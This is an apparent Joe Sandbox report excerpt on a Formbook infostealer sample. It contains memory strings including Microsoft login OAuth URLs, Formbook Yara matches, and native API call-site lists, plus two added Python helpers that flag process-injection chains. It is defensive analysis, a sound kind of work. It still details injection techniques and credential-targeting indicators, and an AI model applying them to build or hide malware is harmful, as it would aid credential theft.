                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: runas.exe, 00000011.00000002.3352619446.0000000002821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: runas.exe, 00000011.00000003.2796143486.0000000007823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: runas.exe, 00000011.00000002.3352619446.0000000002821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: runas.exe, 00000011.00000002.3352619446.0000000002821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: runas.exe, 00000011.00000002.3352619446.0000000002821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: runas.exe, 00000011.00000002.3352619446.0000000002821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: runas.exe, 00000011.00000002.3352619446.0000000002821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: runas.exe, 00000011.00000002.3352619446.0000000002847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comB
                Source: nK1Y86mbzfbkwpB.exe, GDhinOc.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: runas.exe, 00000011.00000003.2822900038.000000000784E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3356454377.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3353699793.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.2784770390.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2496717609.00000000017B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2496908259.0000000001890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3356254035.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2694276231.0000000001B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3356026671.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
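                The Yara hits above are reported as memory-dump names such as 00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp. The report itself ties the first field to the process id in hex and the fourth to the region base address: the same region appears as 7.2.RegSvcs.exe.400000.0.unpack and as the 7_2_ code-function prefix, and the string-source lines pair 00000011 with runas.exe and 00000016 with hAtMBptzWt.exe. The script below is an added example, not Joe Sandbox code, that decodes those names and groups the matches per process. Reading the fifth field as a Win32 page-protection value (0x40 PAGE_EXECUTE_READWRITE, 0x04 PAGE_READWRITE) is an assumption about the dump-name layout; process ids the report does not name in this section are left unnamed rather than guessed.

```python
"""
Added example (not Joe Sandbox code): decode the memory-dump names behind the Yara
matches and group them per process. Field 1 (hex pid) and field 4 (base address)
are taken from cross-references inside the report; the meaning of field 5 as a
page-protection constant is an assumption.
"""
import re
from collections import defaultdict

# Process ids the report names in this section; others stay unnamed.
PID_NAMES = {0x07: "RegSvcs.exe", 0x11: "runas.exe", 0x16: "hAtMBptzWt.exe"}

# Assumed meaning of the fifth field (Win32 PAGE_* constants).
PAGE_PROTECT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}

# Constructed input: the dump names copied from the Yara-match lines above.
MATCHES = """
00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp
00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp
00000011.00000002.3356454377.0000000004270000.00000004.00000800.00020000.00000000.sdmp
00000016.00000002.3353699793.0000000000820000.00000040.80000000.00040000.00000000.sdmp
00000015.00000002.2784770390.0000000002D20000.00000040.80000000.00040000.00000000.sdmp
00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp
00000007.00000002.2496717609.00000000017B0000.00000040.10000000.00040000.00000000.sdmp
00000007.00000002.2496908259.0000000001890000.00000040.10000000.00040000.00000000.sdmp
00000010.00000002.3356254035.0000000002B50000.00000040.00000001.00040000.00000000.sdmp
0000000E.00000002.2694276231.0000000001B10000.00000040.10000000.00040000.00000000.sdmp
00000014.00000002.3356026671.0000000002F10000.00000040.00000001.00040000.00000000.sdmp
"""

DUMP_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\.([0-9A-F]{8})"
    r"\.[0-9A-F]{8}\.[0-9A-F]{8}\.[0-9A-F]{8}\.sdmp$"
)


def parse_dump_name(name):
    """Split one .sdmp name into pid, process name, base address and protection."""
    m = DUMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"unrecognised dump name: {name!r}")
    pid = int(m.group(1), 16)
    protect = int(m.group(5), 16)
    return {
        "pid": pid,
        "process": PID_NAMES.get(pid, f"pid {pid} (not named in this section)"),
        "base": int(m.group(4), 16),
        "protect": protect,
        "protect_name": PAGE_PROTECT.get(protect, f"0x{protect:x} (assumed meaning unknown)"),
    }


def summarise(text):
    """Group parsed dumps by pid so each process's matched regions sit together."""
    per_proc = defaultdict(list)
    for line in text.split():
        d = parse_dump_name(line)
        per_proc[d["pid"]].append(d)
    return dict(per_proc)


def executable_regions(text):
    """(process, base) for every matched dump whose protection field reads as RWX."""
    return [(d["process"], hex(d["base"]))
            for d in (parse_dump_name(l) for l in text.split())
            if d["protect"] == 0x40]


if __name__ == "__main__":
    for pid, dumps in sorted(summarise(MATCHES).items()):
        for d in dumps:
            print(f"{d['process']:<40} base=0x{d['base']:08x} {d['protect_name']}")
    print("RWX regions:", executable_regions(MATCHES))
```

                Under that reading, nine of the eleven matched regions are RWX and none of them sits at an address the report associates with a loaded image except the RegSvcs.exe region at 0x400000, which is exactly the region the report also unpacks as 7.2.RegSvcs.exe.400000.0.unpack and matches against the Formbook rule below. A .NET framework host binary carrying a Formbook PE at its image base is what the injection signatures in the overview describe; the other RWX regions in runas.exe, hAtMBptzWt.exe and the unnamed pids are the places to pull for further unpacking.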

                System Summary

                Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000011.00000002.3356201368.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000011.00000002.3351507216.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000011.00000002.3356454377.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000016.00000002.3353699793.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000015.00000002.2784770390.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2494272058.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2496717609.00000000017B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2496908259.0000000001890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000010.00000002.3356254035.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000E.00000002.2694276231.0000000001B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000014.00000002.3356026671.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0042BE53 NtClose,7_2_0042BE53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2B60 NtClose,LdrInitializeThunk,7_2_014D2B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_014D2DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_014D2C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D35C0 NtCreateMutant,LdrInitializeThunk,7_2_014D35C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D4340 NtSetContextThread,7_2_014D4340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D4650 NtSuspendThread,7_2_014D4650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2BE0 NtQueryValueKey,7_2_014D2BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2BF0 NtAllocateVirtualMemory,7_2_014D2BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2B80 NtQueryInformationFile,7_2_014D2B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2BA0 NtEnumerateValueKey,7_2_014D2BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2AD0 NtReadFile,7_2_014D2AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2AF0 NtWriteFile,7_2_014D2AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2AB0 NtWaitForSingleObject,7_2_014D2AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2D00 NtSetInformationFile,7_2_014D2D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2D10 NtMapViewOfSection,7_2_014D2D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2D30 NtUnmapViewOfSection,7_2_014D2D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2DD0 NtDelayExecution,7_2_014D2DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2DB0 NtEnumerateKey,7_2_014D2DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2C60 NtCreateKey,7_2_014D2C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2C00 NtQueryInformationProcess,7_2_014D2C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2CC0 NtQueryVirtualMemory,7_2_014D2CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2CF0 NtOpenProcess,7_2_014D2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2CA0 NtQueryInformationToken,7_2_014D2CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2F60 NtCreateProcessEx,7_2_014D2F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2F30 NtCreateSection,7_2_014D2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2FE0 NtCreateFile,7_2_014D2FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2F90 NtProtectVirtualMemory,7_2_014D2F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2FA0 NtQuerySection,7_2_014D2FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2FB0 NtResumeThread,7_2_014D2FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2E30 NtWriteVirtualMemory,7_2_014D2E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2EE0 NtQueueApcThread,7_2_014D2EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2E80 NtReadVirtualMemory,7_2_014D2E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2EA0 NtAdjustPrivilegesToken,7_2_014D2EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D3010 NtOpenDirectoryObject,7_2_014D3010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D3090 NtSetValueKey,7_2_014D3090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D39B0 NtGetContextThread,7_2_014D39B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D3D70 NtOpenThread,7_2_014D3D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D3D10 NtOpenProcessToken,7_2_014D3D10
Source: C:\Windows\SysWOW64\runas.exe
    Code function: 17_2_04544650 NtSuspendThread,LdrInitializeThunk
    Code function: 17_2_04544340 NtSetContextThread,LdrInitializeThunk
    Code function: 17_2_04542C70 NtFreeVirtualMemory,LdrInitializeThunk
    Code function: 17_2_04542C60 NtCreateKey,LdrInitializeThunk
    Code function: 17_2_04542CA0 NtQueryInformationToken,LdrInitializeThunk
    Code function: 17_2_04542D10 NtMapViewOfSection,LdrInitializeThunk
    Code function: 17_2_04542D30 NtUnmapViewOfSection,LdrInitializeThunk
    Code function: 17_2_04542DD0 NtDelayExecution,LdrInitializeThunk
    Code function: 17_2_04542DF0 NtQuerySystemInformation,LdrInitializeThunk
    Code function: 17_2_04542EE0 NtQueueApcThread,LdrInitializeThunk
    Code function: 17_2_04542E80 NtReadVirtualMemory,LdrInitializeThunk
    Code function: 17_2_04542F30 NtCreateSection,LdrInitializeThunk
    Code function: 17_2_04542FE0 NtCreateFile,LdrInitializeThunk
    Code function: 17_2_04542FB0 NtResumeThread,LdrInitializeThunk
    Code function: 17_2_04542AD0 NtReadFile,LdrInitializeThunk
    Code function: 17_2_04542AF0 NtWriteFile,LdrInitializeThunk
    Code function: 17_2_04542B60 NtClose,LdrInitializeThunk
    Code function: 17_2_04542BF0 NtAllocateVirtualMemory,LdrInitializeThunk
    Code function: 17_2_04542BE0 NtQueryValueKey,LdrInitializeThunk
    Code function: 17_2_04542BA0 NtEnumerateValueKey,LdrInitializeThunk
    Code function: 17_2_045435C0 NtCreateMutant,LdrInitializeThunk
    Code function: 17_2_045439B0 NtGetContextThread,LdrInitializeThunk
    Code function: 17_2_04542C00 NtQueryInformationProcess
    Code function: 17_2_04542CC0 NtQueryVirtualMemory
    Code function: 17_2_04542CF0 NtOpenProcess
    Code function: 17_2_04542D00 NtSetInformationFile
    Code function: 17_2_04542DB0 NtEnumerateKey
    Code function: 17_2_04542E30 NtWriteVirtualMemory
    Code function: 17_2_04542EA0 NtAdjustPrivilegesToken
    Code function: 17_2_04542F60 NtCreateProcessEx
    Code function: 17_2_04542F90 NtProtectVirtualMemory
    Code function: 17_2_04542FA0 NtQuerySection
    Code function: 17_2_04542AB0 NtWaitForSingleObject
    Code function: 17_2_04542B80 NtQueryInformationFile
    Code function: 17_2_04543010 NtOpenDirectoryObject
    Code function: 17_2_04543090 NtSetValueKey
    Code function: 17_2_04543D70 NtOpenThread
    Code function: 17_2_04543D10 NtOpenProcessToken
    Code function: 17_2_023C8A20 NtReadFile
    Code function: 17_2_023C8B10 NtDeleteFile
    Code function: 17_2_023C8BB0 NtClose
    Code function: 17_2_023C88B0 NtCreateFile
    Code function: 17_2_023C8D10 NtAllocateVirtualMemory
    Code function: 17_2_0437F92C NtMapViewOfSection
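The listing above is raw sandbox output: one line per resolved native call site, with the function id repeated at the end of each line as link residue from the HTML export. The following Python helper is an added triage example, not part of the Joe Sandbox report or of any Joe Security tooling. It parses lines in exactly the shape shown above (the fused export form as well as the cleaned form), groups the Nt* API names per analysed process, and flags a process as carrying a complete remote-injection chain when its call sites cover all three stages of opening a target, placing code in it, and running that code. The stage sets and the "shared module offset" heuristic (Nt stubs whose low 16 address bits coincide in two processes, suggesting the same relocated code mapped at different bases) are this example's own assumptions; the sample input is a constructed subset of the report lines above.

```python
"""Added triage helper for Joe Sandbox "Code function" lines (not part of the report).

Each line has the shape
    Source: <image>Code function: <proc>_<run>_<addr> <Api>[,<Api>...],<proc>_<run>_<addr>
where the repeated trailing id is link residue from the HTML export. The parser
drops it, groups native API names per analysed process and flags processes whose
Nt* call sites form a complete remote-injection chain.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set, Tuple

Record = Tuple[int, str, int, List[str]]  # (process index, image, address, api names)

_LINE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*Code function:\s*"
    r"(?P<id>(?P<proc>\d+)_\d+_(?P<addr>[0-9A-Fa-f]{8}))(?P<rest>.*)$"
)

# Assumed stage sets: one API from every stage is enough to put code into
# another process and execute it.
STAGES: Dict[str, Set[str]] = {
    "open_target": {"NtOpenProcess", "NtOpenThread"},
    "place_code": {"NtWriteVirtualMemory", "NtMapViewOfSection"},
    "run_code": {"NtQueueApcThread", "NtSetContextThread", "NtResumeThread", "NtCreateThreadEx"},
}


def parse_line(line: str) -> Optional[Record]:
    """Parse one 'Source: ... Code function: ...' line; None if it is not one."""
    m = _LINE.match(line.strip())
    if not m:
        return None
    fid, rest = m.group("id"), m.group("rest").strip()
    if rest.endswith(fid):  # strip the duplicated function id
        rest = rest[: -len(fid)]
    apis = [a for a in rest.strip().rstrip(",").split(",") if a]
    return int(m.group("proc")), m.group("src"), int(m.group("addr"), 16), apis


def parse_report(lines: Iterable[str]) -> List[Record]:
    return [r for r in map(parse_line, lines) if r is not None]


def apis_by_process(records: List[Record]) -> Dict[Tuple[int, str], Set[str]]:
    """Nt* API names seen per (process index, image)."""
    out: Dict[Tuple[int, str], Set[str]] = defaultdict(set)
    for proc, src, _addr, apis in records:
        out[(proc, src)].update(a for a in apis if a.startswith("Nt"))
    return dict(out)


def injection_chains(records: List[Record]) -> Dict[Tuple[int, str], Dict[str, List[str]]]:
    """Processes exposing at least one API from every STAGES entry."""
    flagged = {}
    for key, apis in apis_by_process(records).items():
        hits = {stage: sorted(apis & names) for stage, names in STAGES.items()}
        if all(hits.values()):
            flagged[key] = hits
    return flagged


def shared_stubs(records: List[Record]) -> Dict[Tuple[str, int], Set[int]]:
    """Nt* stubs whose low 16 address bits coincide in more than one process.

    Heuristic (an assumption of this example, not a statement of the report):
    code relocated as a whole module keeps its intra-module offsets, so the
    same offset in two processes suggests one stub table mapped at two bases.
    """
    seen: Dict[Tuple[str, int], Set[int]] = defaultdict(set)
    for proc, _src, addr, apis in records:
        for api in apis:
            if api.startswith("Nt"):
                seen[(api, addr & 0xFFFF)].add(proc)
    return {k: v for k, v in seen.items() if len(v) > 1}


# Constructed sample: a subset of the lines from the report excerpt above.
SAMPLE_LINES = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2EE0 NtQueueApcThread,7_2_014D2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2E80 NtReadVirtualMemory,7_2_014D2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D3D70 NtOpenThread,7_2_014D3D70
Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04544340 NtSetContextThread,LdrInitializeThunk,17_2_04544340
Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542D10 NtMapViewOfSection,LdrInitializeThunk,17_2_04542D10
Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542EE0 NtQueueApcThread,LdrInitializeThunk,17_2_04542EE0
Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542E80 NtReadVirtualMemory,LdrInitializeThunk,17_2_04542E80
Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542FB0 NtResumeThread,LdrInitializeThunk,17_2_04542FB0
Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542CF0 NtOpenProcess,17_2_04542CF0
Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04542E30 NtWriteVirtualMemory,17_2_04542E30
Source: C:\Windows\SysWOW64\runas.exeCode function: 17_2_04543D70 NtOpenThread,17_2_04543D70
Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exeCode function: 0_2_02782B170_2_02782B17
""".strip().splitlines()

RECORDS = parse_report(SAMPLE_LINES)

if __name__ == "__main__":
    for (proc, src), hits in injection_chains(RECORDS).items():
        print(f"[{proc}] {src}: injection chain {hits}")
    for (api, off), procs in sorted(shared_stubs(RECORDS).items()):
        print(f"{api} at module offset 0x{off:04x} seen in processes {sorted(procs)}")
```

On this subset only runas.exe (process 17) is flagged: it exposes NtOpenProcess/NtOpenThread, NtWriteVirtualMemory/NtMapViewOfSection and NtQueueApcThread/NtSetContextThread/NtResumeThread. RegSvcs.exe (process 7) is not, because the excerpt above starts mid-list and the lines shown for it contain no write primitive; run the helper over the full report before drawing a conclusion about that process. The three stubs present in both processes (NtQueueApcThread, NtReadVirtualMemory, NtOpenThread) sit at the same low 16 address bits in each, which is what the shared-offset heuristic reports.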
Source: C:\Users\user\Desktop\nK1Y86mbzfbkwpB.exe
    Code functions: 0_2_02782B17, 0_2_02787448, 0_2_027801A0, 0_2_02780B60, 0_2_02780B5B, 0_2_0278734A,
                    0_2_06F7D3C1, 0_2_06F723B0, 0_2_06F70AA0, 0_2_06F75458, 0_2_06F77530, 0_2_06F72371,
                    0_2_06F75020, 0_2_06F70A90, 0_2_06F77A40, 0_2_06F75890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    Code functions: 7_2_00403020, 7_2_0041699E, 7_2_004169A3, 7_2_00402AEC, 7_2_00404445, 7_2_0042E463,
                    7_2_0040FC03, 7_2_0040FE23, 7_2_0040DEA3, 7_2_01528158, 7_2_01490100, 7_2_0153A118,
                    7_2_015581CC, 7_2_015541A2, 7_2_015601AA, 7_2_01532000, 7_2_0155A352, 7_2_015603E6,
                    7_2_014AE3F0, 7_2_01540274, 7_2_015202C0, 7_2_014A0535, 7_2_01560591, 7_2_01552446,
                    7_2_01544420, 7_2_0154E4F6, 7_2_014C4750, 7_2_014A0770, 7_2_0149C7C0, 7_2_014BC6E0,
                    7_2_014B6962, 7_2_014A29A0, 7_2_0156A9A6, 7_2_014A2840, 7_2_014AA840, 7_2_014CE8F0,
                    7_2_014868B8, 7_2_0155AB40, 7_2_01556BD7, 7_2_0149EA80, 7_2_014AAD00, 7_2_0153CD1F,
                    7_2_0149ADE0, 7_2_014B8DBF, 7_2_014A0C00, 7_2_01490CF2, 7_2_01540CB5, 7_2_01514F40,
                    7_2_01542F30, 7_2_014E2F28, 7_2_014C0F30, 7_2_01492FC8, 7_2_014ACFE0, 7_2_0151EFA0,
                    7_2_014A0E59, 7_2_0155EE26, 7_2_0155EEDB, 7_2_0155CE93, 7_2_014B2E90, 7_2_014D516C,
                    7_2_0148F172, 7_2_0156B16B, 7_2_014AB1B0, 7_2_014A70C0, 7_2_0154F0CC, 7_2_0155F0E0,
                    7_2_015570E9, 7_2_0148D34C, 7_2_0155132D, 7_2_014E739A, 7_2_014BB2C0, 7_2_015412ED,
                    7_2_014A52A0, 7_2_01557571, 7_2_015695C3, 7_2_0153D5B0, 7_2_01491460, 7_2_0155F43F,
                    7_2_0155F7B0, 7_2_014E5630, 7_2_015516CC, 7_2_014A9950, 7_2_014BB950, 7_2_01535910,
                    7_2_0150D800, 7_2_014A38E0, 7_2_0155FB76, 7_2_01515BF0, 7_2_014DDBF9, 7_2_014BFB80,
                    7_2_01557A46, 7_2_0155FA49, 7_2_01513A6C, 7_2_0154DAC6, 7_2_014E5AA0, 7_2_01541AA3,
                    7_2_0153DAAC, 7_2_014A3D40, 7_2_01551D5A, 7_2_01557D73, 7_2_014BFDC0, 7_2_01519C32,
                    7_2_0155FCF2, 7_2_0155FF09, 7_2_01463FD5, 7_2_01463FD2, 7_2_014A1F92, 7_2_0155FFB1,
                    7_2_014A9EB0
Source: C:\Users\user\AppData\Roaming\GDhinOc.exe
    Code functions: 8_2_04F87448, 8_2_04F8161A, 8_2_04F801A0, 8_2_04F82AF0, 8_2_04F80B60, 8_2_04F80B5B,
                    8_2_04F87438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    Code functions: 14_2_016F0100, 14_2_01746000, 14_2_017802C0, 14_2_01700535, 14_2_01700770, 14_2_01724750,
                    14_2_016FC7C0, 14_2_0171C6E0, 14_2_01716962, 14_2_017029A0, 14_2_0170A840, 14_2_01702840,
                    14_2_0172E8F0, 14_2_016E68B8, 14_2_01738890, 14_2_016FEA80, 14_2_0170ED7A, 14_2_0170AD00,
                    14_2_016FADE0, 14_2_01708DC0, 14_2_01718DBF, 14_2_01700C00, 14_2_016F0CF2, 14_2_01774F40,
                    14_2_01720F30, 14_2_01742F28, 14_2_016F2FC8, 14_2_0177EFA0, 14_2_01700E59, 14_2_01712E90,
                    14_2_016EF172, 14_2_0173516C, 14_2_0170B1B0, 14_2_016ED34C, 14_2_017033F3, 14_2_0171D2F0,
                    14_2_0171B2C0, 14_2_017052A0, 14_2_016F1460, 14_2_017474E0, 14_2_01703497, 14_2_0170B730,
                    14_2_01709950, 14_2_0171B950, 14_2_01705990, 14_2_0176D800, 14_2_017038E0, 14_2_01775BF0,
                    14_2_0173DBF9, 14_2_0171FB80, 14_2_01773A6C, 14_2_01703D40, 14_2_0171FDC0, 14_2_01779C32,
                    14_2_01719C20, 14_2_01701F92, 14_2_01709EB0
Source: C:\Program Files (x86)\iHCptkpThbKfqchulqsPQhxaPCNUHfdWasVPvuhWFDLcDNWQcDvXwYmBxtLWlGYJrhjKyPhgqV\hAtMBptzWt.exe
    Code functions: 16_2_02EF09DC, 16_2_02EF29B1, 16_2_02F10FF1, 16_2_02EE6FD3, 16_2_02EF2791, 16_2_02EF952C,
                    16_2_02EF9531
